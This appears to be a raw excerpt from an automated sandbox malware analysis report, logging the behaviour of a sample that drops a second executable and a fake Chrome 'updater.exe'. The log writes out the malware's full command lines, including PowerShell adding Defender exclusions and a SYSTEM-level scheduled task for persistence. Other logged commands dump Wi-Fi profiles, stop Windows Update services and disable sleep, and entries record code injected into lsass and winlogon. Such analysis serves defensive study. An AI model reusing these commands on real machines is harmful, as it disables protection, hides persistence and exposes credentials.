          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F02761B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001F02761B50C
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E407E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002311E407E70
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E413218 SetUnhandledExceptionFilter,29_2_000002311E413218
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E40B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002311E40B50C
          Source: C:\Users\user\Desktop\zufmUwylvo.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1F6C8470000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 261AC8D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F0275E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2311E3D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D5F7F50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC8AE0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 204BC7A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C4D790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 2A587ED0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Google\Chrome\updater.exe base: 80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27E55A50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2092EC50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17BB1400000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EB17B40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 296CFDF0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 15C97E00000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AF4FEA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1725BE60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21FBD0F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2547E170000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 287AB6C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FAFDF40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AC1DE80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 224FD600000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B7BF240000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2CE700000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C9BD560000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28957E00000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24DDA140000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AFEC660000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 294A81A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 12F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2839C3A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A7A8560000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD1DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,19_2_00007FF744DD1DB4
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: C8472908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: AC8D2908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 275E2908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: 1E3D2908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F7F52908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C8AE2908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: BC7A2908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4D792908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Program Files\Google\Chrome\updater.exe EIP: 82908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe EIP: 87ED2908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 55A52908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2EC52908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: B1402908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 17B42908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe EIP: CFDF2908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe EIP: 97E02908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4FEA2908
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5BE62908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BD0F2908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7E172908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB6C2908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FDF42908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1DE82908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD602908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BF242908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CE702908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BD562908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 57E02908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DA142908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EC662908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A81A2908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 12F2908
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9C3A2908
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeNtProtectVirtualMemory: Direct from: 0x1412A1127Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeNtResumeThread: Indirect: 0x125D40124CAJump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeNtOpenFile: Direct from: 0x14100F204
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1412C0ABC
          Source: C:\Users\user\Desktop\zufmUwylvo.exeNtEnumerateValueKey: Indirect: 0x125D4012AC1Jump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Indirect: 0x140FFF996
          Source: C:\Program Files\Google\Chrome\updater.exeNtMapViewOfSection: Direct from: 0x141D27DE5
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeNtProtectVirtualMemory: Direct from: 0x1415D0BA0Jump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeNtClose: Direct from: 0x1412B3B60
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1415CE6E3
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeNtClose: Direct from: 0x141D12BBD
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeNtProtectVirtualMemory: Direct from: 0x141040B0AJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeNtDeviceIoControlFile: Indirect: 0x125D4012D4DJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeNtProtectVirtualMemory: Direct from: 0x1412BD7F7Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeNtQuerySystemInformation: Indirect: 0x125D4013107Jump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1415C2178
          Source: C:\Program Files\Google\Chrome\updater.exeNtAdjustPrivilegesToken: Direct from: 0x14000749E
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1415D9790
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeNtMapViewOfSection: Direct from: 0x1412772D4Jump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1412ADDC1
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1412C601C
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeNtUnmapViewOfSection: Direct from: 0x1412CDCCEJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeNtQuerySystemInformation: Indirect: 0x125D40121FDJump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1412D1594
          Source: C:\Users\user\Desktop\zufmUwylvo.exeNtEnumerateValueKey: Indirect: 0x125D4012AF5Jump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeNtUnmapViewOfSection: Direct from: 0x1412A583F
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1415D841E
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1412C21DB
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeNtOpenFile: Direct from: 0x14102A3E4Jump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeNtProtectVirtualMemory: Direct from: 0x1415E28CB
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F6C8470000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 261AC8D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F0275E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2311E3D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D5F7F50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC8AE0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 204BC7A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C4D790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 2A587ED0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 80000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27E55A50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2092EC50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17BB1400000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EB17B40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 296CFDF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 15C97E00000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AF4FEA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1725BE60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21FBD0F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2547E170000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 287AB6C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FAFDF40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AC1DE80000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 224FD600000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B7BF240000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2CE700000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C9BD560000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28957E00000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24DDA140000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFEC660000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 294A81A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2839C3A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A7A8560000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonly
          Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonly
          Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonly
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeThread register set: target process: 8464Jump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 8788
          Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 5936
          Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 8556
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeMemory written: C:\Windows\System32\dialer.exe base: 48C3098010Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F6C8470000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 261AC8D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F0275E0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2311E3D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D5F7F50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC8AE0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 204BC7A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C4D790000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 2A587ED0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 80000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27E55A50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2092EC50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17BB1400000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EB17B40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 296CFDF0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 15C97E00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AF4FEA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1725BE60000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21FBD0F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2547E170000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 287AB6C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FAFDF40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AC1DE80000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 224FD600000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B7BF240000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2CE700000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C9BD560000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28957E00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24DDA140000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFEC660000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 294A81A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2839C3A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A7A8560000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: C385F7C690
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1A7A7D70000
          Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 94F53EB010
          Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 6BF8C55010
          Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 9C039E9010
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#irktvxcx#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#irktvxcx#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }Jump to behavior
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,19_2_00007FF744DD1C64
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,19_2_00007FF744DD1C64
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAEBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Manager2\
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Managerp^\
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp^\
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB56F000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Manager
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D36D14A0 cpuid 0_2_00000125D36D14A0
          Source: C:\Users\user\Desktop\zufmUwylvo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
